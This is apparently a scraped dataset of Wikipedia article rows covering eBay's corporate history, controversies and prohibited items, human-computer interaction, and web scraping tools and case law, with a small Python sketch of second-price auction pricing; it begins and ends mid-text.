106 107 In September 2019, facing pressure from activist shareholder Elliott Investment Management, Devin Wenig resigned as CEO. Scott Schenkel, senior vice president and chief financial officer since 2015, was appointed as the interim CEO. 108 109 In November 2019, eBay agreed to sell StubHub to Viagogo for $4.05 billion in cash; the sale was completed in February 2020. 110 111 112 In April 2020, Jamie Iannone became the CEO of the company. 113 In June 2020, Fred D. Anderson and Thomas J. Tierney resigned from the board of directors of the company; both had been directors since 2003. 114 In July 2020, eBay sold its classifieds business to Adevinta for $2.5 billion in cash and 540 million shares of Adevinta. To gain regulatory approval, Gumtree was further divested. eBay sold its shares in Adevinta in 2023, when that company was acquired by private equity firms. 115 116 117 In September 2020, Pierre Omidyar resigned from the board of directors, after resigning as chairman in 2015. 118 In November 2021, eBay sold its South Korean business to Emart for $3 billion. 119 120 In May 2022, eBay acquired a stake in Funko and became the preferred secondary marketplace for Funko. 121 In June 2022, the company acquired KnownOrigin, a marketplace for non-fungible tokens. 122 123 In August 2022, the company acquired the myFitment group of companies, specializing in online sales of automotive and powersports parts and accessories. 124 In October 2022, the company acquired TCGPlayer, a marketplace for collectible card games, for up to $295 million. 125 126 In July 2023, the company acquired Certiligo, a provider of artificial intelligence-powered digital IDs and authentication for apparel and fashion goods. 127 128 In January 2024, the company announced plans to lay off 9% of its workforce after hiring outpaced growth projections. 129 Using MissionFish as an arbiter, eBay allows sellers to donate a portion of their auction proceeds to a charity of the seller's choice and charges discounted fees for charity auctions. 146 High-profile charity auctions facilitated via eBay include the "Power Lunch" with investor Warren Buffett for 8 people at the Smith Wollensky restaurant in New York City, with all of the proceeds going to the Glide Foundation. Auctions were held annually in 21 years between 2000 and 2022, with no auctions in 2020 and 2021 due to the COVID 19 pandemic. In total, auctions on eBay for lunch with Buffett raised $53.2 million for the Glide Foundation, with winning bids ranging from $2 million to as high as $19 million for the final auction in 2022. 147 148 149 150 In May 2024, a charity auction for lunch with Marc Benioff, CEO of Salesforce, raised $200,000 plus an additional donation of $1.5 million for Glide Foundation. 151 Also benefitting charity, a letter sent to Mark P. Mays, CEO of Clear Channel Communications by Senator Harry Reid and forty other Democratic senators, complaining about comments made by conservative talk show host Rush Limbaugh, sold for $2,100,100, with all of the proceeds going to the Marine Corps-Law Enforcement Foundation, benefiting the education of children of men and women who have died serving in the armed forces. The winning bid was matched by Limbaugh. 152 In 2022, more than $163 million was raised for charities via the platform. 
1 Fraud committed by sellers includes selling counterfeit merchandise bootleg recordings, shill bidding (undisclosed vendor bidding that is used to artificially inflate the price of a certain item by either the seller under an alternate account or another person in collusion with the seller), receiving payment and not shipping merchandise, shipping items other than those described, giving a deliberately misleading description and or photo, knowingly and deliberately shipping faulty merchandise, denying warranty exchange after pre-agreeing to return merchandise authorization of defective on arrival merchandise, knowingly fencing (selling stolen goods), misrepresenting the cost of shipping, using bulk shipping prices to knowingly mask much higher costing, individual return shipping, and using pseudo-accounts to make high nonpaying bids on similar items that competitors are selling. eBay has been criticized for not doing enough to combat shill bidding. There are techniques such as auction sniping, which let buyers avoid shill bidders. 153 154 Fraud committed by buyers includes filing a false shipping damage claim with the shipping company, friendly fraud (receiving merchandise and claiming otherwise), returning items other than received, removing parts from an item and returning it for a refund, sending a forged payment-service e-mail that states that he or she has made a payment to the seller's account as proof of payment, making a low bid then using pseudo-accounts to make high nonpaying bids in an attempt at gaining a low second chance offer price, damaging a non-refundable item to get a refund by claiming that the seller sent the item already damaged (in cases of buyer's remorse), and a package redirection scam, in which the return package is filled with garbage and sent to the wrong address. 155 156 In 2004, Tiffany Co. filed a lawsuit against eBay claiming that over 70% of the Tiffany silver jewelry offered for sale on eBay was fake and that eBay profited from the sales of counterfeit Tiffany items that infringed on its trademark. 157 On July 14, 2008, a Federal District Court judge ruled that eBay does not have a legal responsibility to monitor users selling counterfeit items. 158 In 2010, the Second Circuit affirmed this decision in Tiffany (NJ) Inc. v. eBay Inc. 159 In June 2008, a court in Paris awarded damages of 40 million to LVMH over eBay auctions of counterfeit bags, perfumes, and other items sold by non-authorized retailers and entered a permanent injunction against eBay auctions of LVMH perfumes, whether counterfeit or not. eBay banned such items from its site. 160 161 Also that month, a court in Troyes, France awarded eBay to pay luxury goods maker Herm s 20,000 due to the sale of two counterfeit bags on eBay in 2006. The court also ordered eBay to post the ruling on the home page of eBay's French website for three months. 162 eBay allows buyers to rate any seller with positive, neutral, and negative comments. However, the option for sellers to leave anything other than positive feedback to buyers was removed in 2008. 163 164 Criticism of the feedback system includes the fact that small and large transactions carry the same weight in the feedback summary. It is therefore possible for a dishonest user to initially build up a deceptive positive rating by buying or selling low value items, such as e-books, recipes, etc., then subsequently switch to fraud. 
165 In 2007 and 2008, during the period of eBay's ownership of PayPal, eBay required sellers to accept and buyers to pay with PayPal in many instances. This resulted in scrutiny by several regulatory agencies worldwide. 166 167 168 169 The company later changed its payment requirements. 170 In 2008, eBay reached a deal with Buy.com to list millions of items for sale by the retailer, angering sellers who faced additional competition. 171 In January 2010, Auctionbytes.com held an open survey in which sellers could rate eBay, as well as competing auction and marketplace sites. In the survey, users were asked to rank 15 sites based on five criteria: profitability, customer service, communication, ease of use, and recommendation. eBay was ranked 13th, after other large sites such as Amazon.com and Craigslist, as well as lesser-known selling sites such as Atomic Mall, eCRATER, and Ruby Lane. In individual category rankings, eBay was rated the worst of all the 15 sites on customer service and communication, and average on ease of use. Some respondents stated they would have given eBay a rating of 10, three to five years ago. eBay was rated twelfth out of fifteen in the Recommended Selling Venue category. 172 173 In 2011, eBay agreed to pay $30 million to settle a class action lawsuit alleging that it overcharged seller fees for sales of auto parts and accessories between April 2005 and August 2009. Members of the class received a refund of 6.67% of the fees paid in this category. 174 eBay has been criticized for arranging its affairs so as to pay a low level of taxes in the United Kingdom. The Sunday Times reported in October 2012 that eBay paid only 1.2 million in tax on sales of over 800 million in 2010. eBay responded that it "complies fully with all applicable tax laws". 175 On May 21, 2014, the company revealed that the consumer database of usernames, passwords, phone numbers, and physical addresses was breached between late February and early March. Users were forced to change their passwords. The Syrian Electronic Army took responsibility for the attack and said that it would not misuse the data; however, in a move of website defacement, replaced the front pages of the websites with their own logo. 176 177 178 179 In June 2020, five employees were terminated and were subject to charges of cyberstalking after they were accused of targeting Ina and David Steiner, the editors and publishers of EcommerceBytes, a newsletter that eBay executives viewed as critical of the company. In addition to sending harassing messages and doxing, the defendants "ordered anonymous and disturbing deliveries to the victims’ home, including a preserved fetal pig, a bloody pig Halloween mask, a funeral wreath, a book on surviving the loss of a spouse, and pornography". The defendants also vandalized the couple's home in Natick, Massachusetts. 180 181 182 183 184 The conspirators pleaded guilty and most were sentenced to prison terms. 185 Wenig, the company's CEO at the time of the harassment campaign, who was frequently targeted by the newsletter and was described as having paranoia over the criticism, was not charged, instead leaving the company in September 2019 with a $57 million severance package. 186 187 188 189 Steve Wymer, chief communication officer, who had ties with local politicians, was fired "for cause" for alleged involvement but was not charged and was hired by the local chapter of the Boys Girls Clubs of America. 
190 191 192 193 Items prohibited to be sold on the website include illegal items such as child pornography, counterfeit products; or items that require licenses to sell such as tobacco, alcoholic beverages, firearms and ammunition, certain knives, 194 human body parts, 195 196 drugs, tarot readings and spells, 197 198 virtual in-game items; 199 as well as offensive items such as Nazi memorabilia, flags of the Confederate States of America, and used sex toys. Regulations vary by jurisdiction. In late 1999, a man offered one of his kidneys for auction on eBay, attempting to profit from the potentially lucrative (and, in the United States, illegal) market for organ transplants. 200 Two previously undiscovered species, including the Coelopleurus exquisitus sea urchin in 2006, have been listed for sale on eBay. 201 In January 2010, eBay withdrew a listing of a Dad's Army board game since the box graphics contained images of swastikas, claiming that it was Nazi paraphernalia and, as such, breached the terms of service. eBay was accused of pandering to political correctness. 202 Items stolen from the British Museum in 2013 were auctioned on eBay in 2016. The museum reported that several items of jewelry made of gold, semi-precious stones, and glass, dating from between 1,500 BC and the 19th century AD, were among those missing. One piece of ancient Roman jewelry made from onyx valued between 25,000 and 50,000, or US$32,000 and US$63,000 was listed on eBay with a minimum price of 40 (US$50) in 2016. There were no bids made for the treasure. The police are investigating this case. 203 The company said that it supports local police in investigations and removes listings containing stolen property. 204 In 2021, the estate of Dr. Seuss asked eBay to ban the sale of six Dr. Seuss books due to concerns that some images contained therein were racially insensitive, and the company complied. This led to backlash from followers of right-wing politics and ignited a surge of interest in the discontinued books. 205 206 207 In September 2023, the United States Department of Justice sued eBay, accusing it of violating the Clean Air Act and other environmental laws by allowing the sale of several illegal products, including devices that defeat automobile pollution controls, restricted-use pesticides, and paint and coating removal products containing methylene chloride. 208 |
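Row 606 above notes in passing that eBay resolves auctions with a sealed-bid, second-price ("Vickrey"-style) proxy system: each bidder submits a private maximum, and the leader pays only enough to beat the runner-up. The sketch below is a simplified illustration of that idea, not eBay's actual pricing rules; the function name, starting price, and bid increment are assumptions made for the example.

# Simplified illustration of second-price ("Vickrey"-style) proxy bidding.
# The starting price and increment are assumptions, not eBay's real rules.
def proxy_auction_price(max_bids, start_price=1.00, increment=0.50):
    """max_bids maps bidder name -> private maximum bid; returns (winner, price paid)."""
    if not max_bids:
        return None, start_price
    ranked = sorted(max_bids.items(), key=lambda item: item[1], reverse=True)
    winner, top_bid = ranked[0]
    runner_up = ranked[1][1] if len(ranked) > 1 else start_price
    # The winner pays just enough to beat the runner-up, capped at their own maximum.
    return winner, min(top_bid, runner_up + increment)

# Hypothetical example: proxy_auction_price({"alice": 20.00, "bob": 12.50}) -> ("alice", 13.00)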
607 | https://en.wikipedia.org/wiki/Web_scraping | https://ar.wikipedia.org/wiki/%D8%AA%D8%AC%D8%B1%D9%8A%D9%81_%D9%88%D9%8A%D8%A8 | 1 ( : Web scraping) (HTTP) . . HTML . . . . . |
608 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Human-computer_interaction | Human computer interaction (HCI) is research in the design and the use of computer technology, which focuses on the interfaces between people (users) and computers. HCI researchers observe the ways humans interact with computers and design technologies that allow humans to interact with computers in novel ways. A device that allows interaction between human being and a computer is known as a "Human-computer Interface (HCI) . As a field of research, human computer interaction is situated at the intersection of computer science, behavioral sciences, design, media studies, and several other fields of study. The term was popularized by Stuart K. Card, Allen Newell, and Thomas P. Moran in their 1983 book, The Psychology of Human Computer Interaction. The first known use was in 1975 by Carlisle. 1 The term is intended to convey that, unlike other tools with specific and limited uses, computers have many uses which often involve an open-ended dialogue between the user and the computer. The notion of dialogue likens human computer interaction to human-to-human interaction: an analogy that is crucial to theoretical considerations in the field. 2 3 Humans interact with computers in many ways, and the interface between the two is crucial to facilitating this interaction. HCI is also sometimes termed human machine interaction (HMI), man-machine interaction (MMI) or computer-human interaction (CHI). Desktop applications, internet browsers, handheld computers, and computer kiosks make use of the prevalent graphical user interfaces (GUI) of today. 4 Voice user interfaces (VUI) are used for speech recognition and synthesizing systems, and the emerging multi-modal and Graphical user interfaces (GUI) allow humans to engage with embodied character agents in a way that cannot be achieved with other interface paradigms. The growth in human computer interaction field has led to an increase in the quality of interaction, and resulted in many new areas of research beyond. Instead of designing regular interfaces, the different research branches focus on the concepts of multimodality citation needed over unimodality, intelligent adaptive interfaces over command action based ones, and active interfaces over passive interfaces. 5 The Association for Computing Machinery (ACM) defines human computer interaction as "a discipline that is concerned with the design, evaluation, and implementation of interactive computing systems for human use and with the study of major phenomena surrounding them". 4 A key aspect of HCI is user satisfaction, also referred to as End-User Computing Satisfaction. It goes on to say: "Because human computer interaction studies a human and a machine in communication, it draws from supporting knowledge on both the machine and the human side. On the machine side, techniques in computer graphics, operating systems, programming languages, and development environments are relevant. On the human side, communication theory, graphic and industrial design disciplines, linguistics, social sciences, cognitive psychology, social psychology, and human factors such as computer user satisfaction are relevant. And, of course, engineering and design methods are relevant. 4 Due to the multidisciplinary nature of HCI, people with different backgrounds contribute to its success. Poorly designed human-machine interfaces can lead to many unexpected problems. 
A classic example is the Three Mile Island accident, a nuclear meltdown accident, where investigations concluded that the design of the human-machine interface was at least partly responsible for the disaster. 6 7 8 Similarly, accidents in aviation have resulted from manufacturers' decisions to use non-standard flight instruments or throttle quadrant layouts: even though the new designs were proposed to be superior in basic human-machine interaction, pilots had already ingrained the "standard" layout. Thus, the conceptually good idea had unintended results. The human computer interface can be described as the point of communication between the human user and the computer. The flow of information between the human and computer is defined as the loop of interaction. The loop of interaction has several aspects to it, including: Human computer interaction studies the ways in which humans make—or do not make—use of computational artifacts, systems, and infrastructures. Much of the research in this field seeks to improve the human computer interaction by improving the usability of computer interfaces. 9 How usability is to be precisely understood, how it relates to other social and cultural values, and when it is, and when it may not be a desirable property of computer interfaces is increasingly debated. 10 11 Much of the research in the field of human computer interaction takes an interest in: Visions of what researchers in the field seek to achieve might vary. When pursuing a cognitivist perspective, researchers of HCI may seek to align computer interfaces with the mental model that humans have of their activities. When pursuing a post-cognitivist perspective, researchers of HCI may seek to align computer interfaces with existing social practices or existing sociocultural values. Researchers in HCI are interested in developing design methodologies, experimenting with devices, prototyping software, and hardware systems, exploring interaction paradigms, and developing models and theories of interaction. The following experimental design principles are considered, when evaluating a current user interface, or designing a new user interface: The iterative design process is repeated until a sensible, user-friendly interface is created. 14 Various strategies delineating methods for human PC interaction design have developed since the conception of the field during the 1980s. Most plan philosophies come from a model for how clients, originators, and specialized frameworks interface. Early techniques treated clients' psychological procedures as unsurprising and quantifiable and urged plan specialists to look at subjective science to establish zones, (for example, memory and consideration) when structuring UIs. Present-day models, in general, center around a steady input and discussion between clients, creators, and specialists and push for specialized frameworks to be folded with the sorts of encounters clients need to have, as opposed to wrapping user experience around a finished framework. Displays are human-made artifacts designed to support the perception of relevant system variables and facilitate further processing of that information. Before a display is designed, the task that the display is intended to support must be defined (e.g., navigating, controlling, decision making, learning, entertaining, etc.). 
A user or operator must be able to process whatever information a system generates and displays; therefore, the information must be displayed according to principles to support perception, situation awareness, and understanding. Christopher Wickens et al. defined 13 principles of display design in their book An Introduction to Human Factors Engineering. 18 These human perception and information processing principles can be utilized to create an effective display design. A reduction in errors, a reduction in required training time, an increase in efficiency, and an increase in user satisfaction are a few of the many potential benefits that can be achieved by utilizing these principles. Certain principles may not apply to different displays or situations. Some principles may also appear to be conflicting, and there is no simple solution to say that one principle is more important than another. The principles may be tailored to a specific design or situation. Striking a functional balance among the principles is critical for an effective design. 19 1. Make displays legible (or audible). A display's legibility is critical and necessary for designing a usable display. If the characters or objects being displayed cannot be discernible, the operator cannot effectively use them. 2. Avoid absolute judgment limits. Do not ask the user to determine the level of a variable based on a single sensory variable (e.g., color, size, loudness). These sensory variables can contain many possible levels. 3. Top-down processing. Signals are likely perceived and interpreted by what is expected based on a user's experience. If a signal is presented contrary to the user's expectation, more physical evidence of that signal may need to be presented to assure that it is understood correctly. 4. Redundancy gain. If a signal is presented more than once, it is more likely to be understood correctly. This can be done by presenting the signal in alternative physical forms (e.g., color and shape, voice and print, etc.), as redundancy does not imply repetition. A traffic light is a good example of redundancy, as color and position are redundant. 5. Similarity causes confusion: Use distinguishable elements. Signals that appear to be similar will likely be confused. The ratio of similar features to different features causes signals to be similar. For example, A423B9 is more similar to A423B8 than 92 is to 93. Unnecessarily similar features should be removed, and dissimilar features should be highlighted. 6. Principle of pictorial realism. A display should look like the variable that it represents (e.g., the high temperature on a thermometer shown as a higher vertical level). If there are multiple elements, they can be configured in a manner that looks like they would in the represented environment. 7. Principle of the moving part. Moving elements should move in a pattern and direction compatible with the user's mental model of how it actually moves in the system. For example, the moving element on an altimeter should move upward with increasing altitude. 8. Minimizing information access cost or interaction cost. When the user's attention is diverted from one location to another to access necessary information, there is an associated cost in time or effort. A display design should minimize this cost by allowing frequently accessed sources to be located at the nearest possible position. However, adequate legibility should not be sacrificed to reduce this cost. 9. Proximity compatibility principle. 
Divided attention between two information sources may be necessary for the completion of one task. These sources must be mentally integrated and are defined to have close mental proximity. Information access costs should be low, which can be achieved in many ways (e.g., proximity, linkage by common colors, patterns, shapes, etc.). However, close display proximity can be harmful by causing too much clutter. 10. Principle of multiple resources. A user can more easily process information across different resources. For example, visual and auditory information can be presented simultaneously rather than presenting all visual or all auditory information. 11. Replace memory with visual information: knowledge in the world. A user should not need to retain important information solely in working memory or retrieve it from long-term memory. A menu, checklist, or another display can aid the user by easing the use of their memory. However, memory use may sometimes benefit the user by eliminating the need to reference some knowledge globally (e.g., an expert computer operator would rather use direct commands from memory than refer to a manual). The use of knowledge in a user's head and knowledge in the world must be balanced for an effective design. 12. Principle of predictive aiding. Proactive actions are usually more effective than reactive actions. A display should eliminate resource-demanding cognitive tasks and replace them with simpler perceptual tasks to reduce the user's mental resources. This will allow the user to focus on current conditions and to consider possible future conditions. An example of a predictive aid is a road sign displaying the distance to a certain destination. 13. Principle of consistency. Old habits from other displays will easily transfer to support the processing of new displays if they are designed consistently. A user's long-term memory will trigger actions that are expected to be appropriate. A design must accept this fact and utilize consistency among different displays. Topics in human computer interaction include the following: Social computing is an interactive and collaborative behavior considered between technology and people. In recent years, there has been an explosion of social science research focusing on interactions as the unit of analysis, as there are a lot of social computing technologies that include blogs, emails, social networking, quick messaging, and various others. Much of this research draws from psychology, social psychology, and sociology. For example, one study found out that people expected a computer with a man's name to cost more than a machine with a woman's name. 20 Other research finds that individuals perceive their interactions with computers more negatively than humans, despite behaving the same way towards these machines. 21 In human and computer interactions, a semantic gap usually exists between human and computer's understandings towards mutual behaviors. Ontology, as a formal representation of domain-specific knowledge, can be used to address this problem by solving the semantic ambiguities between the two parties. 22 In the interaction of humans and computers, research has studied how computers can detect, process, and react to human emotions to develop emotionally intelligent information systems. Researchers have suggested several 'affect-detection channels'. The potential of telling human emotions in an automated and digital fashion lies in improvements to the effectiveness of human computer interaction. 
The influence of emotions in human computer interaction has been studied in fields such as financial decision-making using ECG and organizational knowledge sharing using eye-tracking and face readers as affect-detection channels. In these fields, it has been shown that affect-detection channels have the potential to detect human emotions and those information systems can incorporate the data obtained from affect-detection channels to improve decision models. A brain computer interface (BCI), is a direct communication pathway between an enhanced or wired brain and an external device. BCI differs from neuromodulation in that it allows for bidirectional information flow. BCIs are often directed at researching, mapping, assisting, augmenting, or repairing human cognitive or sensory-motor functions. 23 Security interactions are the study of interaction between humans and computers specifically as it pertains to information security. Its aim, in plain terms, is to improve the usability of security features in end user applications. Unlike HCI, which has roots in the early days of Xerox PARC during the 1970s, HCISec is a nascent field of study by comparison. Interest in this topic tracks with that of Internet security, which has become an area of broad public concern only in very recent years. When security features exhibit poor usability, the following are common reasons: Traditionally, computer use was modeled as a human computer dyad in which the two were connected by a narrow explicit communication channel, such as text-based terminals. Much work has been done to make the interaction between a computing system and a human more reflective of the multidimensional nature of everyday communication. Because of potential issues, human computer interaction shifted focus beyond the interface to respond to observations as articulated by D. Engelbart: "If ease of use were the only valid criterion, people would stick to tricycles and never try bicycles. 24 How humans interact with computers continues to evolve rapidly. Human computer interaction is affected by developments in computing. These forces include: As of 2010 update the future for HCI is expected 25 to include the following characteristics: One of the main conferences for new research in human computer interaction is the annually held Association for Computing Machinery's (ACM) Conference on Human Factors in Computing Systems, usually referred to by its short name CHI (pronounced kai, or Khai). CHI is organized by ACM Special Interest Group on Computer-Human Interaction (SIGCHI). CHI is a large conference, with thousands of attendants, and is quite broad in scope. It is attended by academics, practitioners, and industry people, with company sponsors such as Google, Microsoft, and PayPal. There are also dozens of other smaller, regional, or specialized HCI-related conferences held around the world each year, including: 26 |
609 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-15 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the 